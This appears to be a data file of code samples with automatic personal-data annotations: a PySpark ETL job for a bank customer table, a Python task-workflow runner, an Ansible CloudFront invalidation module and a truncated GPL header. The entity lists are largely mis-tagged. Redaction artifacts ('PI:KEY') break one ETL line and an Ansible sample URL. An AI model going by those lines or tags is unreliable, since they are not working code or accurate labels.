| 4,654 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'Amar Takhar dummy@email.com'], ['LOCATION', 'sys.argv'], ['PERSON', 'buildbot'], ['PERSON', 'dryrun'], ['PERSON', 'buildmaster'], ['LOCATION', 'del changed[0]\n\n change_info'], ['PERSON', 'del change_info[0]\n\n '], ['PERSON', 'pbcf'], ['URL', 'buildbot.py'], ['URL', 'email.com'], ['URL', 'buildbot.py'], ['URL', 'sys.ve'], ['URL', 'sys.ar'], ['URL', 'sys.argv.in'], ['URL', 'sys.ar'], ['URL', 'sys.ar'], ['URL', 'sys.ar'], ['URL', 'sys.st'], ['URL', 'sys.st'], ['URL', 'twisted.int'], ['URL', 'twisted.py'], ['URL', 'twisted.cr'], ['URL', 'usage.er'], ['URL', 'commands.ge'], ['URL', 'commands.ge'], ['URL', 'opts.ge'], ['URL', 'opts.ge'], ['URL', 'opts.ge'], ['URL', 'reactor.co'], ['URL', 'credentials.Us'], ['URL', 'd.ad'], ['URL', 'self.se'], ['URL', 'remote.ca'], ['URL', 'opts.pa'], ['URL', 'usage.er'], ['URL', 'sys.ar'], ['URL', 'self.ge'], ['URL', 'changes.ke'], ['URL', 'self.se'], ['URL', 'reactor.st'], ['URL', 'reactor.st'], ['URL', 'd.ad'], ['URL', 'd.ad'], ['URL', 'reactor.ca'], ['URL', 'reactor.ru'], ['URL', 's.ru']] |
95 | #coding=UTF-8
from pyspark import SparkContext, SparkConf, SQLContext, Row, HiveContext
from pyspark.sql.types import *
from datetime import date, datetime, timedelta
import sys, re, os
st = datetime.now()
conf = SparkConf().setAppName('PROC_O_LNA_XDXT_CUSTOMER_INFO').setMaster(sys.argv[2])
sc = SparkContext(conf = conf)
sc.setLogLevel('WARN')
if len(sys.argv) > 5:
if sys.argv[5] == "hive":
sqlContext = HiveContext(sc)
else:
sqlContext = SQLContext(sc)
hdfs = sys.argv[3]
dbname = sys.argv[4]
# Dates used in processing
etl_date = sys.argv[1]
# ETL date
V_DT = etl_date
# Previous day
V_DT_LD = (date(int(etl_date[0:4]), int(etl_date[4:6]), int(etl_date[6:8])) + timedelta(-1)).strftime("%Y%m%d")
# First day of the current month
V_DT_FMD = date(int(etl_date[0:4]), int(etl_date[4:6]), 1).strftime("%Y%m%d")
# Last day of the previous month
V_DT_LMD = (date(int(etl_date[0:4]), int(etl_date[4:6]), 1) + timedelta(-1)).strftime("%Y%m%d")
# 10-character date (YYYY-MM-DD)
V_DT10 = (date(int(etl_date[0:4]), int(etl_date[4:6]), int(etl_date[6:8]))).strftime("%Y-%m-%d")
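# worked example: etl_date = '20160105' gives V_DT_LD = '20160104',
# V_DT_FMD = '20160101', V_DT_LMD = '20151231' and V_DT10 = '2016-01-05'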
V_STEP = 0
O_CI_XDXT_CUSTOMER_INFO = sqlContext.read.parquet(hdfs+'/O_CI_XDXT_CUSTOMER_INFO/*')
O_CI_XDXT_CUSTOMER_INFO.registerTempTable("O_CI_XDXT_CUSTOMER_INFO")
# Task [12] 001-01::
V_STEP = V_STEP + 1
# First delete all existing data from the target table
ret = os.system("hdfs dfs -rm -r /"+dbname+"/F_CI_XDXT_CUSTOMER_INFO/*.parquet")
# Copy yesterday's full snapshot over from the backup table
ret = os.system("hdfs dfs -cp -f /"+dbname+"/F_CI_XDXT_CUSTOMER_INFO_BK/"+V_DT_LD+".parquet /"+dbname+"/F_CI_XDXT_CUSTOMER_INFO/"+V_DT+".parquet")
F_CI_XDXT_CUSTOMER_INFO = sqlContext.read.parquet(hdfs+'/F_CI_XDXT_CUSTOMER_INFO/*')
F_CI_XDXT_CUSTOMER_INFO.registerTempTable("F_CI_XDXT_CUSTOMER_INFO")
sql = """
SELECT A.CUSTOMERID AS CUSTOMERID
,A.CUSTOMERNAME AS CUSTOMERNAME
,A.CUSTOMERTYPE AS CUSTOMERTYPE
,A.CERTTYPE AS CERTTYPE
,A.CERTID AS CERTID
,A.CUSTOMERPASSWORD AS CUSTOMERPASSWORD
,A.INPUTORGID AS INPUTORGID
,A.INPUTUSERID AS INPUTUSERID
,A.INPUTDATE AS INPUTDATE
,A.REMARK AS REMARK
,A.MFCUSTOMERID AS MFCUSTOMERID
,A.STATUS AS STATUS
,A.BELONGGROUPID AS BELONGGROUPID
,A.CHANNEL AS CHANNEL
,A.LOANCARDNO AS LOANCARDNO
,A.CUSTOMERSCALE AS CUSTOMERSCALE
,A.CORPORATEORGID AS CORPORATEORGID
,A.REMEDYFLAG AS REMEDYFLAG
,A.DRAWFLAG AS DRAWFLAG
,A.MANAGERUSERID AS MANAGERUSERID
,A.MANAGERORGID AS MANAGERORGID
,A.DRAWELIGIBILITY AS DRAWELIGIBILITY
,A.BLACKSHEETORNOT AS BLACKSHEETORNOT
,A.CONFIRMORNOT AS CONFIRMORNOT
,A.CLIENTCLASSN AS CLIENTCLASSN
,A.CLIENTCLASSM AS CLIENTCLASSM
,A.BUSINESSSTATE AS BUSINESSSTATE
,A.MASTERBALANCE AS MASTERBALANCE
,A.UPDATEDATE AS UPDATEDATE
,A.FR_ID AS FR_ID
,V_DT AS ODS_ST_DATE
,'LNA' AS ODS_SYS_ID
       FROM O_CI_XDXT_CUSTOMER_INFO A                       --customer basic information
"""
sql = re.sub(r"\bV_DT\b", "'"+V_DT10+"'", sql)
F_CI_XDXT_CUSTOMER_INFO_INNTMP1 = sqlContext.sql(sql)
F_CI_XDXT_CUSTOMER_INFO_INNTMP1.registerTempTable("F_CI_XDXT_CUSTOMER_INFO_INNTMP1")
#F_CI_XDXT_CUSTOMER_INFO = sqlContext.read.parquet(hdfs+'/F_CI_XDXT_CUSTOMER_INFO/*')
#F_CI_XDXT_CUSTOMER_INFO.registerTempTable("F_CI_XDXT_CUSTOMER_INFO")
sql = """
    SELECT DST.CUSTOMERID         --customer ID:src.CUSTOMERID
          ,DST.CUSTOMERNAME       --customer name:src.CUSTOMERNAME
          ,DST.CUSTOMERTYPE       --customer type:src.CUSTOMERTYPE
          ,DST.CERTTYPE           --certificate type:src.CERTTYPE
          ,DST.CERTID             --certificate number:src.CERTID
          ,DST.CUSTOMERPASSWORD   --customer password:src.CUSTOMERPASSWORD
          ,DST.INPUTORGID         --registering organization:src.INPUTORGID
          ,DST.INPUTUSERID        --registrant:src.INPUTUSERID
          ,DST.INPUTDATE          --registration date:src.INPUTDATE
          ,DST.REMARK             --remark:src.REMARK
          ,DST.MFCUSTOMERID       --core customer number:src.MFCUSTOMERID
          ,DST.STATUS             --status:src.STATUS
          ,DST.BELONGGROUPID      --affiliated group code:src.BELONGGROUPID
          ,DST.CHANNEL            --channel:src.CHANNEL
          ,DST.LOANCARDNO         --loan card number:src.LOANCARDNO
          ,DST.CUSTOMERSCALE      --customer scale:src.CUSTOMERSCALE
          ,DST.CORPORATEORGID     --legal-entity organization number:src.CORPORATEORGID
          ,DST.REMEDYFLAG         --backfill flag:src.REMEDYFLAG
          ,DST.DRAWFLAG           --collection flag:src.DRAWFLAG
          ,DST.MANAGERUSERID      --account manager:src.MANAGERUSERID
          ,DST.MANAGERORGID       --managing organization ID:src.MANAGERORGID
          ,DST.DRAWELIGIBILITY    --collection eligibility:src.DRAWELIGIBILITY
          ,DST.BLACKSHEETORNOT    --blacklisted customer or not:src.BLACKSHEETORNOT
          ,DST.CONFIRMORNOT       --effective or not:src.CONFIRMORNOT
          ,DST.CLIENTCLASSN       --current customer classification:src.CLIENTCLASSN
          ,DST.CLIENTCLASSM       --customer classification adjustment:src.CLIENTCLASSM
          ,DST.BUSINESSSTATE      --legacy-stock field flag:src.BUSINESSSTATE
          ,DST.MASTERBALANCE      --single-account balance:src.MASTERBALANCE
          ,DST.UPDATEDATE         --update date:src.UPDATEDATE
          ,DST.FR_ID              --legal-entity code:src.FR_ID
          ,DST.ODS_ST_DATE        --platform date:src.ODS_ST_DATE
          ,DST.ODS_SYS_ID         --source system code:src.ODS_SYS_ID
FROM F_CI_XDXT_CUSTOMER_INFO DST
LEFT JOIN F_CI_XDXT_CUSTOMER_INFO_INNTMP1 SRC
ON SRC.CUSTOMERID = DST.CUSTOMERID
AND SRC.FR_ID = DST.FR_ID
WHERE SRC.CUSTOMERID IS NULL """
sql = re.sub(r"\bV_DT\b", "'"+V_DT10+"'", sql)
F_CI_XDXT_CUSTOMER_INFO_INNTMP2 = sqlContext.sql(sql)
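# INNTMP1 holds today's refreshed rows; INNTMP2 keeps the rows absent from
# today's extract (SRC.CUSTOMERID IS NULL); their union below rebuilds the table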
dfn="F_CI_XDXT_CUSTOMER_INFO/"+V_DT+".parquet"
PI:KEY.unionAll(F_CI_XDXT_CUSTOMER_INFO_INNTMP1)
F_CI_XDXT_CUSTOMER_INFO_INNTMP1.cache()
F_CI_XDXT_CUSTOMER_INFO_INNTMP2.cache()
nrowsi = F_CI_XDXT_CUSTOMER_INFO_INNTMP1.count()
nrowsa = F_CI_XDXT_CUSTOMER_INFO_INNTMP2.count()
F_CI_XDXT_CUSTOMER_INFO_INNTMP2.write.save(path = hdfs + '/' + dfn, mode='overwrite')
F_CI_XDXT_CUSTOMER_INFO_INNTMP1.unpersist()
F_CI_XDXT_CUSTOMER_INFO_INNTMP2.unpersist()
et = datetime.now()
print("Step %d start[%s] end[%s] use %d seconds, insert F_CI_XDXT_CUSTOMER_INFO lines %d, all lines %d") % (V_STEP, st.strftime("%H:%M:%S"), et.strftime("%H:%M:%S"), (et-st).seconds, nrowsi, nrowsa)
ret = os.system("hdfs dfs -mv /"+dbname+"/F_CI_XDXT_CUSTOMER_INFO/"+V_DT_LD+".parquet /"+dbname+"/F_CI_XDXT_CUSTOMER_INFO_BK/")
# First delete today's data from the backup table
ret = os.system("hdfs dfs -rm -r /"+dbname+"/F_CI_XDXT_CUSTOMER_INFO_BK/"+V_DT+".parquet")
# Copy today's full snapshot from the target table to the backup table
ret = os.system("hdfs dfs -cp -f /"+dbname+"/F_CI_XDXT_CUSTOMER_INFO/"+V_DT+".parquet /"+dbname+"/F_CI_XDXT_CUSTOMER_INFO_BK/"+V_DT+".parquet")
| 7,703 | [['LOCATION', '处理需要使用的日期'], ['LOCATION', '月初日期'], ['DATE_TIME', 'A.CERTTYPE'], ['LOCATION', 'A.CONFIRMORNOT'], ['PERSON', 'DST.BLACKSHEETORNOT'], ['PERSON', 'BLACKSHEETORNOT'], ['LOCATION', 'DST.CONFIRMORNOT'], ['NRP', 'DST.CLIENTCLASSN'], ['PERSON', 'nrowsa'], ['LOCATION', 'nrowsi'], ['LOCATION', 'nrowsa'], ['IP_ADDRESS', '01::\n'], ['URL', 'datetime.no'], ['URL', 'sys.ar'], ['URL', 'sc.se'], ['URL', 'sys.ar'], ['URL', 'sys.ar'], ['URL', 'sys.ar'], ['URL', 'sys.ar'], ['URL', 'sys.ar'], ['URL', 'sqlContext.read.pa'], ['URL', 'INFO.re'], ['URL', 'os.sy'], ['URL', 'os.sy'], ['URL', 'sqlContext.read.pa'], ['URL', 'INFO.re'], ['URL', 'A.CU'], ['URL', 'A.CU'], ['URL', 'A.CU'], ['URL', 'A.CU'], ['URL', 'A.IN'], ['URL', 'A.IN'], ['URL', 'A.IN'], ['URL', 'A.RE'], ['URL', 'A.ST'], ['URL', 'A.BE'], ['URL', 'A.CH'], ['URL', 'A.CU'], ['URL', 'A.CO'], ['URL', 'A.RE'], ['URL', 'A.MA'], ['URL', 'A.MA'], ['URL', 'A.CO'], ['URL', 'A.CL'], ['URL', 'A.CL'], ['URL', 'A.MA'], ['URL', 'A.FR'], ['URL', 're.su'], ['URL', 'INNTMP1.re'], ['URL', 'sqlContext.read.pa'], ['URL', 'INFO.re'], ['URL', 'DST.CU'], ['URL', 'src.CU'], ['URL', 'DST.CU'], ['URL', 'src.CU'], ['URL', 'DST.CU'], ['URL', 'src.CU'], ['URL', 'DST.CU'], ['URL', 'src.CU'], ['URL', 'DST.IN'], ['URL', 'src.IN'], ['URL', 'DST.IN'], ['URL', 'src.IN'], ['URL', 'DST.IN'], ['URL', 'src.IN'], ['URL', 'DST.RE'], ['URL', 'src.RE'], ['URL', 'DST.ST'], ['URL', 'src.ST'], ['URL', 'DST.BE'], ['URL', 'src.BE'], ['URL', 'DST.CH'], ['URL', 'src.CH'], ['URL', 'DST.CU'], ['URL', 'src.CU'], ['URL', 'DST.CO'], ['URL', 'src.CO'], ['URL', 'DST.RE'], ['URL', 'src.RE'], ['URL', 'DST.MA'], ['URL', 'src.MA'], ['URL', 'DST.MA'], ['URL', 'src.MA'], ['URL', 'DST.CO'], ['URL', 'src.CO'], ['URL', 'DST.CL'], ['URL', 'src.CL'], ['URL', 'DST.CL'], ['URL', 'src.CL'], ['URL', 'DST.MA'], ['URL', 'src.MA'], ['URL', 'DST.FR'], ['URL', 'src.FR'], ['URL', 'SRC.CU'], ['URL', 'DST.CU'], ['URL', 'SRC.FR'], ['URL', 'DST.FR'], ['URL', 'SRC.CU'], ['URL', 're.su'], ['URL', 'INNTMP1.ca'], ['URL', 'INNTMP2.ca'], ['URL', 'INNTMP1.co'], ['URL', 'INNTMP2.co'], ['URL', 'INNTMP2.write.sa'], ['URL', 'datetime.no'], ['URL', 'st.st'], ['URL', 'et.st'], ['URL', 'os.sy'], ['URL', 'os.sy'], ['URL', 'os.sy']] |
96 | #!/usr/bin/python
"""
Copyright (c) 2014 High-Performance Computing and GIS (HPCGIS) Laboratory. All rights reserved.
Use of this source code is governed by a BSD-style license that can be found in the LICENSE file.
Authors and contributors: Eric Shook (dummy@email.com)
"""
import os
import datetime
import time
import re
import subprocess
from Queue import Queue
#from threading import Thread
import threading
import sys,getopt
'''
The workflow script accepts a tasklist file, which contains a list of taskfiles.
A task may represent a simulation of an ABM or climate model. Tasks can be run
simultaneously if there are no dependencies or ordered in the case of
dependencies. Tasks may also include pre-processing or post-processing tasks.
'''
# TODO: Logging may be useful if the workflow becomes long
# TODO: Currently num_threads is user-defined, which controls the number of threads that launch tasks
# However, it would be better to include in the taskfile the number of cores needed
# and define the number of cores available, enabling the workflow system to manage core allocation
# Global variables
# The number of threads used to handle tasks is passed as a parameter
num_threads=0
# Array of threads (so they can be killed if needed)
threads=[]
# Array of task workflow numbers (one per thread/worker)
threadtasknums=[]
# Task queue
taskqueue=Queue()
# This function handles executing a task defined by a taskfile
def runtask(taskfile):
# Read and parse the taskfile with the following format
# Note additional parameters will likely be added based on need (e.g., CWD, data-dir)
'''
program: /path/to/executable_with_a_name
parameters: param1 -Optionalconfiguration param2 -AnotherParameter
'''
with open(taskfile,'r') as f:
# Set the required parameters as None for error checking at the end
program=None
parameters=None
for line in f:
if line.startswith("program:"):
# Extract the entire program location from after the colon split()[1]) with whitespace removed (strip())
program=line.split(":",1)[1].strip()
#print "Program="+program
if line.startswith("parameters:"):
# Extract the parameter string from after the colon split()[1]) with whitespace removed (strip())
parameters=line.split(":",1)[1].strip()
#print "Parameters="+parameters
# Error checking for required parameters
if program==None:
raise Exception("program missing in taskfile",taskfile)
if parameters==None:
raise Exception("parameters missing in taskfile",taskfile)
print "Calling program="+program,parameters
'''
In future versions that have defined input,output,stdout,etc.
there could be more logic here to:
- run each model in a defined directory
- output stdout,stderr in the directory
- package up output files for easier transfer
- ...
'''
returncode=subprocess.check_call(program+" "+parameters,shell=True)
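    # check_call raises CalledProcessError on a nonzero exit status, which
    # propagates up to taskworker and aborts the workflow there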
# A task worker loops while there are tasks left in the taskqueue
# Input parameter is a thread id (tid)
def taskworker(tid):
while not taskqueue.empty():
taskfile=taskqueue.get()
tasknum=taskfile.split("/",1)[1].split(".",1)[0].strip()
tasknum=re.sub("\D", "", tasknum)
#print "tid=",tid
threadtasknums[tid]=int(tasknum)
# While there is a dependency problem (lower order task numbers are still being processed)
        # then spin-wait
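        # Tasks whose filenames parse to the same number may run concurrently;
        # a higher-numbered task starts only once no worker still holds a lower
        # task number, i.e. all lower-numbered tasks have finished.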
mintasknum=min(threadtasknums)
while threadtasknums[tid]>mintasknum:
#print "min=",minthreadtasknum,"min(array)=",min(*threadtasknums),"nums[",i,"]=",threadtasknums[i]
#if(threadtasknums[tid]<=min(*threadtasknums)): # If this task number is less than or equal to the minimum
# break # then there are no dependencies, so you can break out of this infinite loop
time.sleep(1) # this is a spin-wait loop
mintasknum=min(*threadtasknums)
print "Thread",tid,"running",taskfile,"at",str(datetime.datetime.now())
try:
runtask(taskfile)
except:
exit(1)
taskqueue.task_done()
threadtasknums[tid]=999999 # Set the tasknum for tid to 9999 so it doesn't influence dependencies
print "Thread",tid,"quitting, because taskqueue is empty"
# Main program code
def main():
print "Starting node workflow"
try:
opts,args=getopt.getopt(sys.argv[1:],"n:t:",["numthreads=","tasklist="])
except getopt.GetoptError:
print "workflow.py -n <number of threads to launch> -t <tasklistfile>"
sys.exit(1)
# Set model filename and experiment name based on command-line parameter
num_threads=0
tasklistfile=""
for opt, arg in opts:
if opt in ("-n", "--numthreads"):
num_threads=int(arg)
if opt in ("-t", "--tasklist"):
tasklistfile=arg
err=0
if num_threads<=0:
print " [ ERROR ] Number of threads must be greater than 0"
err=1
if tasklistfile=="":
print " [ ERROR ] Must provide tasklistfile"
err=1
if err==1:
print "workflow.py -n <number of threads to launch> -t <tasklistfile>"
sys.exit(1)
print "Executing in current directory :",os.getcwd()
print "Reading tasklist file"
with open(tasklistfile,'r') as f:
taskfiles = f.readlines()
f.close()
# tasksdir = 'tasks/'
# taskfiles = os.listdir(tasksdir) # Contains a list of task files to process
taskfiles.sort()
print "Starting task queue"
for taskfile in taskfiles:
taskqueue.put(taskfile.strip())
print "Task queue contains ",taskqueue.qsize()," tasks"
# Start the workflow engine
# Currently the logic is simple -> one task==one thread==one core but that will need
# to be modified to account for multithreaded models (agent-based and climate)
# so eventually this will need to parse the task to determine the number of cores
# needed by the task and dynamically manage the number of tasks running simultaneously
print "Starting ",num_threads," threads"
for i in range(num_threads):
threadtasknums.append(-1)
t=threading.Thread(target=taskworker,args=(i,))
t.daemon=True
t.setDaemon(True)
t.start()
threads.append(t)
# Now we wait until all of the tasks are finished.
print "Waiting for threads to finish"
# Normally you can use a blocking .join, but then you cannot kill the process
# So instead we spin-wait and catch ^C so a user can kill this process.
# while threading.activeCount() > 0:
# time.sleep(20)
while taskqueue.qsize()>0:
time.sleep(1)
print "taskqueue size",taskqueue.qsize()
''' # FIXME: Need to clean up this code, which was used for testing ^C
try:
time.sleep(5) # Wait 5 seconds before checking again
# FIXME: In production this should be changed to 30
# If Ctrl+C or other error, kill all of the threads
except:
while not taskqueue.empty(): # Empty the queue
taskqueue.get()
for i in threads:
i.kill_received=True
i.kill()
exit(1)
'''
print "Joining taskqueue"
# At this point all of the tasks should be finished so we join them
notfinished=1
while notfinished==1:
notfinished=0
for i in range(num_threads):
if threadtasknums[i]<999999:
notfinished=1
time.sleep(1)
#while not taskqueue.join(1):
# time.sleep(1)
print "Finished node workflow"
# Run main
if __name__=="__main__":
main()
| 7,938 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2014'], ['PERSON', 'Eric Shook'], ['PERSON', "getopt\n\n'"], ['PERSON', 'TODO'], ['PERSON', 'tasknum=taskfile.split("/",1)[1].split("'], ['PERSON', 'tasknum=re.sub("\\D'], ['PERSON', 'tasknum'], ['PERSON', 'mintasknum=min(threadtasknums'], ['PERSON', 'tasksdir'], ['LOCATION', '.join'], ['DATE_TIME', '5 seconds'], ['URL', 'email.com'], ['URL', 'line.st'], ['URL', 'line.st'], ['URL', 'subprocess.ch'], ['URL', 'taskqueue.ge'], ['URL', 're.su'], ['URL', 'time.sl'], ['URL', 'datetime.datetime.no'], ['URL', 'getopt.ge'], ['URL', 'sys.ar'], ['URL', 'getopt.Ge'], ['URL', 'workflow.py'], ['URL', 'workflow.py'], ['URL', 'os.ge'], ['URL', 'f.re'], ['URL', 'f.cl'], ['URL', 'os.li'], ['URL', 'taskfiles.so'], ['URL', 'taskfile.st'], ['URL', 'threading.Th'], ['URL', 't.se'], ['URL', 't.st'], ['URL', 'threading.ac'], ['URL', 'time.sl'], ['URL', 'time.sl'], ['URL', 'time.sl'], ['URL', 'taskqueue.ge'], ['URL', 'i.ki'], ['URL', 'i.ki'], ['URL', 'time.sl'], ['URL', 'taskqueue.jo'], ['URL', 'time.sl']] |
97 | #!/usr/bin/python
# Copyright (c) 2017 Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: cloudfront_invalidation
short_description: create invalidations for AWS CloudFront distributions
description:
- Allows for invalidation of a batch of paths for a CloudFront distribution.
requirements:
- boto3 >= 1.0.0
- python >= 2.6
version_added: "2.5"
author: Willem van Ketwich (@wilvk)
extends_documentation_fragment:
- aws
- ec2
options:
distribution_id:
description:
- The ID of the CloudFront distribution to invalidate paths for. Can be specified instead of the alias.
required: false
type: str
alias:
description:
- The alias of the CloudFront distribution to invalidate paths for. Can be specified instead of distribution_id.
required: false
type: str
caller_reference:
description:
- A unique reference identifier for the invalidation paths.
- Defaults to current datetime stamp.
required: false
default:
type: str
target_paths:
description:
- A list of paths on the distribution to invalidate. Each path should begin with '/'. Wildcards are allowed. eg. '/foo/bar/*'
required: true
type: list
elements: str
notes:
- does not support check mode
'''
EXAMPLES = '''
- name: create a batch of invalidations using a distribution_id for a reference
cloudfront_invalidation:
distribution_id: E15BU8SDCGSG57
caller_reference: testing 123
target_paths:
- /testpathone/test1.css
- /testpathtwo/test2.js
- /testpaththree/test3.ss
- name: create a batch of invalidations using an alias as a reference and one path using a wildcard match
cloudfront_invalidation:
alias: alias.test.com
caller_reference: testing 123
target_paths:
- /testpathone/test4.css
- /testpathtwo/test5.js
- /testpaththree/*
'''
RETURN = '''
invalidation:
description: The invalidation's information.
returned: always
type: complex
contains:
create_time:
description: The date and time the invalidation request was first made.
returned: always
type: str
sample: '2018-02-01T15:50:41.159000+00:00'
id:
description: The identifier for the invalidation request.
returned: always
type: str
sample: I2G9MOWJZFV612
invalidation_batch:
description: The current invalidation information for the batch request.
returned: always
type: complex
contains:
caller_reference:
description: The value used to uniquely identify an invalidation request.
returned: always
type: str
sample: testing 123
paths:
description: A dict that contains information about the objects that you want to invalidate.
returned: always
type: complex
contains:
items:
description: A list of the paths that you want to invalidate.
returned: always
type: list
sample:
- /testpathtwo/test2.js
- /testpathone/test1.css
- /testpaththree/test3.ss
quantity:
description: The number of objects that you want to invalidate.
returned: always
type: int
sample: 3
status:
description: The status of the invalidation request.
returned: always
type: str
sample: Completed
location:
description: The fully qualified URI of the distribution and invalidation batch request.
returned: always
type: str
sample: https://cloudfront.amazonaws.PI:KEY
'''
from ansible.module_utils.ec2 import get_aws_connection_info
from ansible.module_utils.ec2 import ec2_argument_spec, boto3_conn
from ansible.module_utils.ec2 import snake_dict_to_camel_dict
from ansible.module_utils.ec2 import camel_dict_to_snake_dict
from ansible.module_utils.aws.core import AnsibleAWSModule
from ansible.module_utils.aws.cloudfront_facts import CloudFrontFactsServiceManager
import datetime
try:
from botocore.exceptions import ClientError, BotoCoreError
except ImportError:
pass # caught by imported AnsibleAWSModule
class CloudFrontInvalidationServiceManager(object):
"""
Handles CloudFront service calls to AWS for invalidations
"""
def __init__(self, module):
self.module = module
self.create_client('cloudfront')
def create_client(self, resource):
region, ec2_url, aws_connect_kwargs = get_aws_connection_info(self.module, boto3=True)
self.client = boto3_conn(self.module, conn_type='client', resource=resource, region=region, endpoint=ec2_url, **aws_connect_kwargs)
def create_invalidation(self, distribution_id, invalidation_batch):
current_invalidation_response = self.get_invalidation(distribution_id, invalidation_batch['CallerReference'])
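        # a previous invalidation with the same caller reference means this
        # request was already submitted, so it is reported as unchanged below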
try:
response = self.client.create_invalidation(DistributionId=distribution_id, InvalidationBatch=invalidation_batch)
response.pop('ResponseMetadata', None)
if current_invalidation_response:
return response, False
else:
return response, True
except BotoCoreError as e:
self.module.fail_json_aws(e, msg="Error creating CloudFront invalidations.")
except ClientError as e:
if ('Your request contains a caller reference that was used for a previous invalidation batch '
'for the same distribution.' in e.response['Error']['Message']):
self.module.warn("InvalidationBatch target paths are not modifiable. "
"To make a new invalidation please update caller_reference.")
return current_invalidation_response, False
else:
self.module.fail_json_aws(e, msg="Error creating CloudFront invalidations.")
def get_invalidation(self, distribution_id, caller_reference):
current_invalidation = {}
# find all invalidations for the distribution
try:
paginator = self.client.get_paginator('list_invalidations')
invalidations = paginator.paginate(DistributionId=distribution_id).build_full_result().get('InvalidationList', {}).get('Items', [])
invalidation_ids = [inv['Id'] for inv in invalidations]
except (BotoCoreError, ClientError) as e:
self.module.fail_json_aws(e, msg="Error listing CloudFront invalidations.")
# check if there is an invalidation with the same caller reference
for inv_id in invalidation_ids:
try:
invalidation = self.client.get_invalidation(DistributionId=distribution_id, Id=inv_id)['Invalidation']
caller_ref = invalidation.get('InvalidationBatch', {}).get('CallerReference')
except (BotoCoreError, ClientError) as e:
self.module.fail_json_aws(e, msg="Error getting CloudFront invalidation {0}".format(inv_id))
if caller_ref == caller_reference:
current_invalidation = invalidation
break
current_invalidation.pop('ResponseMetadata', None)
return current_invalidation
class CloudFrontInvalidationValidationManager(object):
"""
Manages CloudFront validations for invalidation batches
"""
def __init__(self, module):
self.module = module
self.__cloudfront_facts_mgr = CloudFrontFactsServiceManager(module)
def validate_distribution_id(self, distribution_id, alias):
try:
if distribution_id is None and alias is None:
self.module.fail_json(msg="distribution_id or alias must be specified")
if distribution_id is None:
distribution_id = self.__cloudfront_facts_mgr.get_distribution_id_from_domain_name(alias)
return distribution_id
except (ClientError, BotoCoreError) as e:
self.module.fail_json_aws(e, msg="Error validating parameters.")
def create_aws_list(self, invalidation_batch):
aws_list = {}
aws_list["Quantity"] = len(invalidation_batch)
aws_list["Items"] = invalidation_batch
return aws_list
def validate_invalidation_batch(self, invalidation_batch, caller_reference):
try:
if caller_reference is not None:
valid_caller_reference = caller_reference
else:
valid_caller_reference = datetime.datetime.now().isoformat()
valid_invalidation_batch = {
'paths': self.create_aws_list(invalidation_batch),
'caller_reference': valid_caller_reference
}
return valid_invalidation_batch
except (ClientError, BotoCoreError) as e:
self.module.fail_json_aws(e, msg="Error validating invalidation batch.")
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(dict(
caller_reference=dict(),
distribution_id=dict(),
alias=dict(),
target_paths=dict(required=True, type='list')
))
module = AnsibleAWSModule(argument_spec=argument_spec, supports_check_mode=False, mutually_exclusive=[['distribution_id', 'alias']])
validation_mgr = CloudFrontInvalidationValidationManager(module)
service_mgr = CloudFrontInvalidationServiceManager(module)
caller_reference = module.params.get('caller_reference')
distribution_id = module.params.get('distribution_id')
alias = module.params.get('alias')
target_paths = module.params.get('target_paths')
result = {}
distribution_id = validation_mgr.validate_distribution_id(distribution_id, alias)
valid_target_paths = validation_mgr.validate_invalidation_batch(target_paths, caller_reference)
valid_pascal_target_paths = snake_dict_to_camel_dict(valid_target_paths, True)
result, changed = service_mgr.create_invalidation(distribution_id, valid_pascal_target_paths)
module.exit_json(changed=changed, **camel_dict_to_snake_dict(result))
if __name__ == '__main__':
main()
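# A minimal sketch (illustrative values, assumed shapes) of the key-casing step
# above: create_aws_list() already capitalises 'Quantity'/'Items', and
# snake_dict_to_camel_dict(..., True) upper-camelises the outer keys into the
# form the CloudFront API expects:
#
#   valid_target_paths = {'paths': {'Quantity': 2, 'Items': ['/index.html', '/css/*']},
#                         'caller_reference': '2019-01-01T00:00:00'}
#   snake_dict_to_camel_dict(valid_target_paths, True)
#   # -> {'Paths': {'Quantity': 2, 'Items': ['/index.html', '/css/*']},
#   #     'CallerReference': '2019-01-01T00:00:00'}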
| 10,484 | [['DATE_TIME', '2017'], ['PERSON', 'Willem van Ketwich'], ['DATE_TIME', '2018-02-01T15:50:41.159000+'], ['DATE_TIME', "00:00'\n i"], ['PERSON', 'aws_connect_kwargs = get_aws_connection_info(self.module'], ['URL', 'self.mo'], ['LOCATION', 'BotoCoreError'], ['LOCATION', 'BotoCoreError'], ['PERSON', "caller_reference = module.params.get('caller_reference'"], ['LOCATION', 'validation_mgr.validate_invalidation_batch(target_paths'], ['URL', 'https://www.gnu.org/licenses/gpl-3.0.txt'], ['URL', 'https://cloudfront.am'], ['URL', 'alias.test.com'], ['URL', 'ansible.mo'], ['URL', 'utils.ec'], ['URL', 'ansible.mo'], ['URL', 'utils.ec'], ['URL', 'ansible.mo'], ['URL', 'utils.ec'], ['URL', 'ansible.mo'], ['URL', 'utils.ec'], ['URL', 'ansible.mo'], ['URL', 'utils.aws.co'], ['URL', 'ansible.mo'], ['URL', 'utils.aws.cl'], ['URL', 'self.mo'], ['URL', 'self.cr'], ['URL', 'self.cl'], ['URL', 'self.mo'], ['URL', 'self.ge'], ['URL', 'self.client.cr'], ['URL', 'self.mo'], ['URL', 'e.re'], ['URL', 'self.mo'], ['URL', 'self.mo'], ['URL', 'self.client.ge'], ['URL', 'paginator.pa'], ['URL', 'self.mo'], ['URL', 'self.client.ge'], ['URL', 'invalidation.ge'], ['URL', 'self.mo'], ['URL', 'self.mo'], ['URL', 'self.mo'], ['URL', 'mgr.ge'], ['URL', 'self.mo'], ['URL', 'datetime.datetime.no'], ['URL', 'self.cr'], ['URL', 'self.mo'], ['URL', 'module.params.ge'], ['URL', 'module.params.ge'], ['URL', 'module.params.ge'], ['URL', 'module.params.ge'], ['URL', 'mgr.va'], ['URL', 'mgr.va'], ['URL', 'mgr.cr']] |
98 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (C) 2006 José de Paula Eufrásio Junior (dummy@email.com) AND
# Yves Junqueira (dummy@email.com)
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
